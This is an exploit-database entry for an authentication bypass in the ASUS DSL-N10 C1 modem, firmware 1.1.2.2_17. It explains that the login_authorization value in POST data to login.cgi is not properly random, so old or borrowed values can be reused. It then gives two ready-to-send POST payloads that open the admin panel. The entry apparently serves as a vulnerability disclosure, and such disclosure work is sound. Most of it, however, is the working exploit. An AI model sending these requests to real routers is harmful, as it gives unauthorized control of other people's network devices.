ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass Vulnerability

2018-08-15T00:00:00
ID 1337DAY-ID-30888
Type zdt
Reporter AmnBAN
Modified 2018-08-15T00:00:00

Description

Exploit for hardware platform in category web applications

                                        
                                            # Title: ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass
# Author: AmnBAN team
# Vendor Homepage: https://www.asus.com/Networking/DSLN10_C1_with_5dBi_antenna/
# Sofrware version: 1.1.2.2_17
# CVE: N/A
 
# 1. Description:
# In ASUS-DSL N10 C1 modem Firmware Version 1.1.2.2_17 there is login_authorization 
# parameter in post data, that use for authorization access to admin panel, 
# the data of this parameter is not fully random and you can use old data 
# or data of another device to access admin panel.
 
# 2. Proof of Concept:
# Browse http://<Your Modem IP>/login.cgi
 
# Send this post data:
group_id=&action_mode=&action_script=&action_wait=5&current_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=YWRtaW46MQ%3D%2D
 
# Or this post data:
group_id=&action_mode=&action_script=&action_wait=5&current_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=FWRtaW46MQ%3D5D

#  0day.today [2018-08-17]  #